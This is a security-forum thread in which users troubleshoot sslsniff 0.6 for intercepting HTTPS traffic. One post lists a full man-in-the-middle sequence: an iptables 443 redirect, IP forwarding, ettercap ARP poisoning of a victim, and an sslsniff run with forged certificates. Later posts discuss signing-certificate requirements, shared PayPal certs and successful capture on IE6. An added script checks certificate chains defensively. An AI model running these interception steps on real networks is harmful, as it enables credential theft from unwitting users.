Thread: sslsniff 0.6

  1. #1
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default sslsniff 0.6

    For several days I have been trying to install and correctly use sslsniff v0.6. The best results that I got were from ntua.gr. Maybe it isn't the right way, but it's a way.

    sslsniff v0.6 (with a small man page)
    ftp.ntua.gr:/debian/pool/main/s/sslsniff/

    And here are dependencies:

    1) http://ftp.ntua.gr/debian/pool/main/b/boost1.40/
    libboost-filesystem1.40.0
    libboost-system1.40.0
    libboost-thread1.40.0

    2) ftp.ntua.gr:/debian/pool/main/l/log4cpp/
    liblog4cpp5

    sslsniff's home page says that the following packages are needed:
    openssl libboost1.35-dev libboost-filesystem1.35-dev libboost-thread1.35-dev liblog4cpp5-dev
    When I installed boost1.35 from the BackTrack repository and then compiled and ran sslsniff, I always got an asio.hpp read 2 error, or something like that. As far as I understand, asio.hpp is a library from boost. With boost1.40 and sslsniff from ntua.gr installed this problem is fixed, but others come up. I can run sslsniff (short off) only in authority mode. Not 100% successfully, since I am using the wrong certificates and not a vulnerable browser. (I realized that today.) And as far as I know there is no boost1.40 package for Ubuntu, only for Debian.

    Anyway. It would be very nice if we could use sslsniff in BackTrack 4.

  2. #2
    Junior Member
    Join Date
    Oct 2008
    Posts
    32

    Default

    Here is a quick guide to recompiling and installing .deb packages from non-BT distros: Simple Source Builds

    The guide should be added to the official wiki when it comes back up.

  3. #3
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    Thank you for your reply.

    Maybe this is off topic, but you may also find it useful, since you are missing how to add PGP keys.

    Coming Soon: A sane way of adding the gpg key for the Debian Sid repository
    Virchanza's how to:
    http://forums.remote-exploit.org/bac...ads-times.html

    Maybe prowl3r's script (for Ubuntu) will help you finish your paper.

    Nick

  4. #4
    Junior Member
    Join Date
    Oct 2008
    Posts
    32

    Default

    Thanks for the link. I will look into it, however, a tool is already provided for this (no script required). It's called `apt-key`. I just need to get around to learning how to use it.

  5. #5
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    2

    Default sslsniff-0.6 errors

    Hi Nick,
    I was hoping you could post your results here...have you in the meantime found any 100% solution to this problem?

    I'm having a similar one:
    a) download sslsniff-0.6
    b) install dependencies: openssl, libboost1.35-dev, libboost-filesystem1.35-dev, libboost-thread1.35-dev, liblog4cpp5-dev

    1) setting up iptables:
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
    2) ip_forwarding mode setup:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    3) run mitm:
    ettercap -i eth0 -Tq -o -M arp:remote /"VICTIM IP ADDRESS"/ //
    note: victim = my computer, on my local lan
    4) run sslsniff:
    ./sslsniff -t -s 10000 -w sslsniff.log -m IPSCACLASEA1.crt -c ./certs/

    Everything works fine until now. If I try to https with the victim computer, the following is logged in sslsniff.log:
    1256822722 DEBUG sslsniff : Read error: asio.misc:2

    I would most deeply appreciate any help...thanks in advance guys!

  6. #6
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default Please give us some attention

    Quote Originally Posted by palko View Post
    Hi Nick,
    I was hoping you could post your results here...have you in the meantime found any 100% solution to this problem?
    Well, I am glad that I am not the only one suffering.

    No, palko. No progress here. Tried almost everything that my mind can think of. Tried Debian packages, compiled Boost myself, authority mode, targeted mode, IE 6, IE 7... Nothing.

    Yesterday I sent an e-mail to the author of sslsniff about this. I am waiting for a response, but to be honest I am not expecting one. I am not a security analyst and my English is terrible.

    Maybe it could be a good idea to send you OR THE AUTHORS OF BT4 also an e-mail to find out what or how or if we can make sslsniff work.

    Come on guys (authors), don't let us suffer. We are two now. Me and palko.

    Nick

    BTW Welcome to the forums, palko

  7. #7
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    2

    Default sslsniff not working

    Seems to me like the same problem:

    Tried boost1.35, boost1.37, and even compiling boost1.40 myself, but still to no avail. (Honestly I don't know if it's a boost problem, I was just assuming this based on your post, but reading the log it seems just logical.)

    Tried BT 8.10, tried it on Ubuntu 9.04... I'm a noob, don't know if it made any sense to try with 9.04, tried anyway.

    If anybody was able to successfully run sslsniff, it would be helpful to post his configuration here, please.

    @nick: don't know if trying various browsers could affect this, since, at least in my case, sslsniff does not intersect the communication, just redirects it further (like a proxy, not changing the traffic, not providing fake certs, no mitm ...). I'll keep you updated if I find something out!

    see you!

  8. #8
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    GIAC Certified Incident Handler
    Practical Assignment v3

    SSLSniff and IE’s Certification Chain Validation Vulnerability:

    Decomposing an Insider Threat to a Sensitive Web Application
    Download:
    http://www.chipchilders.com/pubs/Chip_Childers_GCIH.pdf

  9. #9
    Just burned his ISO
    Join Date
    May 2009
    Posts
    11

    Default ok i have done a lot of experimenting with it

    OK, I have done a lot of experimenting with it. Sslsniff doesn't work for me.
    I have contacted the author but he was not very helpful.
    So here are some replies from him (after I donated 5 e)...
    These may be helpful...

    > How is the targeted mode and the authority mode used for sslsniff
    > ?
    Code:
    Authority mode will create a cert for the domain clients are trying to
    connect to on the fly and sign it with whatever certificate you specify
    with -c.  So the certificate you specify needs to have basicConstraints:
    CA set to TRUE and it needs to be trusted by the client's browser as a
    signing certificate.
    > what certs should i have in my certs folder?
    Code:
    If you are running in targeted mode, you need to have a valid leaf-node
    certificate in your "certs" directory for whatever domain the client is
    trying to connect to.  If you're trying to intercept traffic to
    google, this means you need a cert with google in the
    CN, which is signed by a CA-cert.
    And two Certs for you guys
    1. trusted -the one that is in the doc that nick linked - For your appetites

    2. Paypal
    Good Luck!!!

    Nick thanks
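
The reply quoted in post #9 says the authority-mode signing certificate must have basicConstraints CA set to TRUE. The following is an added example, not part of the thread and not sslsniff code, that checks that condition from the validating side: every certificate in an issuer position of a PEM bundle must carry CA:TRUE. It assumes the openssl CLI (1.1.1 or newer); the helper names are hypothetical, the sample certificates are constructed self-signed ones, and only basicConstraints is inspected, not signatures.

```sh
# Added example (not from the thread). Assumes the openssl CLI, 1.1.1 or newer.
# is_ca, check_chain and make_cert are hypothetical helper names.

# is_ca FILE: succeed only if FILE carries basicConstraints CA:TRUE.
is_ca() {
    openssl x509 -in "$1" -noout -ext basicConstraints 2>/dev/null | grep -q 'CA:TRUE'
}

# check_chain BUNDLE: BUNDLE is PEM, leaf first, then each issuer in order.
# Prints the subject of the first issuer that is not a CA and returns 1.
check_chain() {
    cc_dir=$(mktemp -d) || return 2
    # Split the bundle into 1.pem, 2.pem, ... (one certificate per file).
    awk -v d="$cc_dir" '/-----BEGIN CERTIFICATE-----/ { n++ }
        n { print > (d "/" n ".pem") }' "$1"
    cc_i=2 cc_rc=0
    while [ -f "$cc_dir/$cc_i.pem" ]; do
        if ! is_ca "$cc_dir/$cc_i.pem"; then
            openssl x509 -in "$cc_dir/$cc_i.pem" -noout -subject
            cc_rc=1
            break
        fi
        cc_i=$((cc_i + 1))
    done
    rm -rf "$cc_dir"
    return "$cc_rc"
}

# make_cert OUT CN FLAG: constructed self-signed sample, FLAG is TRUE or FALSE.
make_cert() {
    mc_cfg=$(mktemp) || return 2
    printf '%s\n' '[req]' 'distinguished_name=dn' 'x509_extensions=ext' \
        'prompt=no' '[dn]' "CN=$2" '[ext]' \
        "basicConstraints=critical,CA:$3" > "$mc_cfg"
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 -config "$mc_cfg" \
        -keyout /dev/null -out "$1" 2>/dev/null
    mc_rc=$?
    rm -f "$mc_cfg"
    return "$mc_rc"
}

# Demo on constructed samples: leaf+CA passes, leaf+leaf is flagged.
demo_dir=$(mktemp -d)
make_cert "$demo_dir/leaf.pem" constructed-leaf FALSE
make_cert "$demo_dir/ca.pem" constructed-ca TRUE
cat "$demo_dir/leaf.pem" "$demo_dir/ca.pem" > "$demo_dir/good.pem"
cat "$demo_dir/leaf.pem" "$demo_dir/leaf.pem" > "$demo_dir/bad.pem"
check_chain "$demo_dir/good.pem" && echo "good.pem: every issuer is a CA"
check_chain "$demo_dir/bad.pem" || echo "bad.pem: issuer above is not a CA"
```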

  10. #10
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    Quote Originally Posted by Jimmy Kane View Post
    ok i have done a lot of experimenting with it. Sslsniff doesn't work for me.
    Jimmy Kane, I can proudly inform you that I got some (I say some) positive results with sslsniff. I can use it with an expired leaf certificate in authority mode only and my client is using IE6. The client complains that the cert has expired, but if I change the date to a date when the certificate was valid, then IE accepts the cert and I can capture data.

    Stay tuned. I will do some further testing and very soon I will post how to install-use sslsniff.

    Nick
